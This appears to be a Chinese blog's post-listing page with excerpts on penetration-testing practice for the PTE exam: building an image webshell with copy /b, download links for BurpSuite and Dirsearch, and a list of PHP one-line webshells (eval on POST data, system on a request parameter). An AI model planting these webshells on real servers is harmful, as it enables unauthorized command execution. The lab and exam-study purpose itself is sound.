摘要: 靶场一 我们先来做一个图片马,图片马是指代码写入后不破坏图片为前提,图片仍可正常打开。 制作过程: 自定义一个新的文件夹,文件夹里放入三个文件。 一张自己喜欢的图片 自定义php代码文件 在当前路径下运行cmd ,并执行copy/b dog.jpg+1.txt dogtest.jpg 我们就用刚做好 阅读全文
posted @ 2021-06-09 15:11 我有清茶与酒 阅读(4199) 评论(3) 推荐(0)
摘要: BurpSuite2021.6 链接:https://pan.baidu.com/s/1JGmkj_yMfyATpT1rno85OA 提取码:1234 Dirsearch 链接:https://pan.baidu.com/s/1YJnFQtuBI_JEbESuRPeawg 提取码:qrsd 弱口令检 阅读全文
posted @ 2021-06-09 10:40 我有清茶与酒 阅读(276) 评论(0) 推荐(0)
摘要: php的一句话木马: <?php phpinfo();?> <?php @eval($_POST['a']);?> <?php eval(@$_POST['a']); ?> <?php eval($_POST[a])?> <?php system($_REQUEST['cmd']);?> <?php 阅读全文
posted @ 2021-06-09 10:03 我有清茶与酒 阅读(367) 评论(0) 推荐(0)
摘要: 由于最近备战pte考试,花钱搞了两套靶场,可惜大题环境差点,前面几题废了好大力气才做出来,给大家分享下靶场思路。 首先,先总结一下考试的内容。题型分为选择题和实操题两部分。满分为100分,选择题有20道,共20分,主要考查一下安全方面的基础知识。 剩下的为80分的实操题,分为6个大题。 1.SQL注 阅读全文
posted @ 2021-06-09 09:24 我有清茶与酒 阅读(9413) 评论(2) 推荐(1)